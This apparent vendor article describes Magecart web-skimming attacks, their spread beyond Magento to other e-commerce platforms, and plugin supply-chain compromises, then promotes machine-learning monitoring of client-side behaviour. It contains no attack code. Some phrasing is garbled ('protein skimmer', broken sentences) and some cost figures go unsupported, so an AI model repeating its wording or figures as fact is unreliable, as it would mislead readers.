The Magecart digital skimming attack group takes its name from the open source e-commerce platform Magento. Most of the online digital skimming attacks undertaken by the so-called “Magecart gangs” target Magento, which still uses many older versions to run e-commerce applications.
But Magecart is now much bigger than Magento. In December 2020, researchers identified a new, more technologically advanced type of Magecart exploit. Designed like other Magecart attacks to extract credit card information from web applications, this one could attack many popular e-commerce platforms and content management systems (CMS). These include Magento, WordPress, Drupal, Shopify, BigCommerce, Salesforce Commerce Cloud, and WooCommerce.
A scourge in the digital age
The emergence of this versatile protein skimmer is one of many indicators that the Magecart gangs are expanding their digital skimming efforts to a wider range of platforms. In May 2021, for example, Magecart gangs were identified as the source of a new variant of digital skimmers called MobileInter targeting mobile browsers and mobile websites. MobileInter has worked to identify mobile users across a wide variety of browsers.
Since its appearance in 2015, Magecart has become a general description of a wide range of digital skimming attacks on web and mobile applications. Previously focused on point-of-sale (POS) terminals where the skimmers may have been physical or on POS system hacks, skimming has quickly moved to the internet and e-commerce platforms over the past five years. . Today, most personal and financial information skimming occurs on the web and mobile apps during cardless transactions.
Often, Magecart skimmers operate for months without the site operators or their security teams being aware of the hack. Since Magecart changes application behavior in subtle ways only on the client side of the application, operators have no easy way to observe the often hard to detect changes in what a user sees. Magecart attacks have successfully compromised thousands of web and mobile applications. The victims include dozens of global brands such as British Airways and Macy’s. The annual cost to online merchants and other operators of Magecart attacks is difficult to calculate precisely because these attacks are counted along with other financial attacks. The tally well exceeds billions of dollars per year in terms of losses, repair costs and damage to reputation. For example, British Airways paid a fine of $ 20 million for failing to protect its customers from a Magecart attack.
How Magecart is evolving beyond Magento
Magecart attackers have also acknowledged that third party plugins and addons can provide efficient paths to compromise other platforms. Magecart gangs insert code into source code repositories or create plugin processes for these attacks. Since plugins typically barely change from one ecommerce platform to another, Magecart’s attack code tends to work well on plugins on all platforms. Known as the “supply chain attack,” this style of Magecart compromise is favored by more sophisticated gangs and is even more dangerous as it delivers its payload through trusted third parties. Site operators may not even have visibility into compromised code; they can only identify the anomaly by spotting the changes clients are experiencing.
How to fight against scalable attacks
More basic cybersecurity tools like Web Application Firewalls (WAFs) do little or nothing to protect against Magecart attacks. WAFs protect against inbound attacks (server side) but do not protect against client side attacks. Some security teams run a static analysis on their web application code to identify changes and anomalies. Magecart attacks escape this by inserting third-party code (like favicons) which is served dynamically. A more effective approach is to use content security policies (CSPs) to guard against business logic and prevent web application code from performing unwanted behavior. CSPs require extensive tuning and are not sufficient protection to protect against compromise, for example, of a trusted domain that injects a skimmer into application code.
Additionally, CSP can control traffic (inbound and outbound) with the domain based on the authorization policy. This method is irrelevant when the attack vector is an authorized domain (like Google or other big software vendors). Applying these restrictions will cause many site failures when developers forget to change the CSP.
To properly guard against all types of Magecart attacks, security teams and site operators should seek solutions that continuously analyze application behavior (client-side security monitoring) to identify minor anomalies that may indicate the problem. presence of a skimmer. Because all skimmers have the same goal, they tend to behave similarly. Machine learning (ML) is an ideal tool to study skimming behaviors and legitimate behaviors of large-scale web applications over billions of interactions.
Using this information, ML technology can recognize common patterns of Magecart behavior and recognize when an application deviates, even slightly, from usual expected behavior. By leveraging real-time behavioral analysis of application behavior and comparing it to past behaviors, retailers can identify real-time Magecart attacks and site operators aware of the problem. As Magecart evolves and expands its target list, knowing the enemy and countering them in real time is the best defense against threat, known and unknown.
PerimeterX provides security services for websites and mobile applications.